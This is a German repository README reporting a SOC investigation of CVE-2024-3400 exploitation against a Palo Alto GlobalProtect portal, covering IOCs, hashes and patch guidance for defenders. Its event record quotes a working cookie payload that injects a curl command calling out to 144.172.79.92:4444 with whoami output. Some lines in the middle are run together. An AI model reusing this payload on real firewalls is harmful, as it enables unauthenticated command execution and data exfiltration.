
Erkennungs-, Analyse- und Reaktionsstrategien für CVE-2024-3400 Ausnutzungsversuche, die auf Palo Alto PAN-OS GlobalProtect-Portale abzielen. Enthält IOCs, Exploit-Muster und Schadensbegrenzungsanleitung.
Erkennungs-, Analyse- und Reaktionsstrategien für CVE-2024-3400-Ausnutzungsversuche, die auf Palo Alto PAN-OS GlobalProtect-Portale abzielen. Enthält IOCs, Exploit-Muster und Anleitungen zur Schadensbegrenzung.
Dieses Repository enthält eine detaillierte Untersuchung und Bedrohungsanalyse von CVE-2024-3400, einer kritischen nicht authentifizierten Befehlsinjektions-Schwachstelle, die Palo Alto Networks PAN-OS betrifft, insbesondere das GlobalProtect-Portal.
Am 18. April 2024 wurde eine Ausnutzungsaktivität gegen eine interne PAN-OS-Firewall unter Verwendung des anfälligen Endpunkts /global-protect/login.esp erkannt. Der Angreifer verwendete ein manipuliertes SESSID-Cookie, das einen per Backtick ausgeführten curl-Befehl enthielt, um einen entfernten C2-Server unter 144.172.79.92 (Miami, Florida) zu erreichen. Die Exploit-Payload nutzte ${IFS}, um einfache Filter zu umgehen, und verwendete das Telemetrie-Verzeichnis von PAN-OS, um schädliche Aktivitäten zu inszenieren. Die Firewall antwortete mit einem , was darauf hindeutet, dass die Payload wahrscheinlich erfolgreich ausgeführt wurde.
200 OK
Ereignis-ID: 249
Erkennungsregel: SOC274 – PAN-OS Command Injection Exploitation
Ereigniszeit: 18. April 2024, 03:09 UTC
Hostname: PA-Firewall-01
Ziel-IP: 172.16.17.139
Quell-IP: 144.172.79.92
Anfragemethode: POST
Endpunkt: /global-protect/login.esp
Cookie-Payload: SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaacurl${IFS}144.172.79.92:4444?user=$(whoami)
Schädliche Hashes:
SHA256: 3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac
MD5: 0c1554888ce9ed0da1583dbdf7b31651
Schädliches Skript: update.py (ausgeführt mit /usr/bin/python3)





SESSID zur Befehlsinjektion${IFS} zur Umgehung/opt/panlogs/tmp/device_telemetrydt_send-Prozesses nach der Ausnutzung4444


10.2.9-h1, 11.0.4-h1 oder 11.1.2-h3144.172.79.92logs/: Analysierte und rohe Erkennungsprotokolleioc/: Datei-Hashes und mit dem Angriff verbundene IPsanalysis/: Tiefgehende Analyse des Exploit-Verhaltens und der Prozessverfolgungreport/: Zusammenfassung und Bilder der Protokolle und Codes meiner UntersuchungenCVE-2024-3400 bezieht sich auf eine kritische Schwachstelle in Palo Alto Networks PAN-OS, die insbesondere GlobalProtect-Gateways betrifft. Hier ist eine Aufschlüsselung dessen, was öffentlich darüber bekannt ist:
CVSS-Score: 10.0 (Kritisch)
Veröffentlicht: April 2024
Betroffene Produkte: PAN-OS 10.2, 11.0 und 11.1 mit aktiviertem GlobalProtect.
Ausnutzung: Im Feld bestätigt (Zero-Day)
Schwachstellentyp: Nicht authentifizierte Befehlsinjektion
CVE-2024-3400 ermöglicht es nicht authentifizierten Angreifern, beliebige Befehle auf dem Betriebssystem der Firewall auszuführen. Dies gibt im Wesentlichen die vollständige Kontrolle über betroffene Geräte ohne Zugangsdaten – ein schwerwiegender Einfallspunkt für jedes Unternehmen, das auf Palo Alto-Firewalls angewiesen ist.
GlobalProtect-Gateway muss aktiviert sein.
Bestimmte PAN-OS-Versionen (10.2.x, 11.0.x, 11.1.x).
Über das Internet ausnutzbar, wenn keine zusätzlichen Sicherheitsebenen vorhanden sind.
Senden von manipulierten Anfragen zur Ausnutzung der Injektionslücke.
Bereitstellung von Remote-Shells oder Herunterladen von Payloads der zweiten Stufe.
Beobachtetes Verhalten umfasst:
Befehlsausführung über manipulierte URLs
Persistenzmechanismen
Laterale Bewegung innerhalb von Netzwerken
Sofort patchen: Palo Alto hat Fixes veröffentlicht; aktualisieren Sie auf nicht anfällige Versionen (z.B. 10.2.9-h1, 11.0.4-h1, 11.1.2-h3 oder höher).
Überprüfen Sie auf Indikatoren für eine Kompromittierung (IOCs) wie verdächtige Prozesse, ausgehende Verbindungen oder ungewöhnliche CLI-Verläufe.
Verwenden Sie Tools wie Shodan oder Asset-Inventare, um anfällige Geräte zu finden.
Suchen Sie nach externen IPs, die auf GlobalProtect zugreifen, ohne gültige Authentifizierung.
Überprüfen Sie die Protokolle auf verdächtige Befehlsausführungen (show system processes, cat /etc/passwd usw.).
Überwachen Sie das Firewall-Verhalten und alarmieren Sie bei anomalen ausgehenden Verbindungen.
Dieses Repository dient sowohl als interner Untersuchungsbericht als auch als Bildungsressource für Verteidiger, die das Verständnis realer Ausnutzung von PAN-OS-Schwachstellen suchen. Beiträge und zusätzliche Beobachtungen sind willkommen.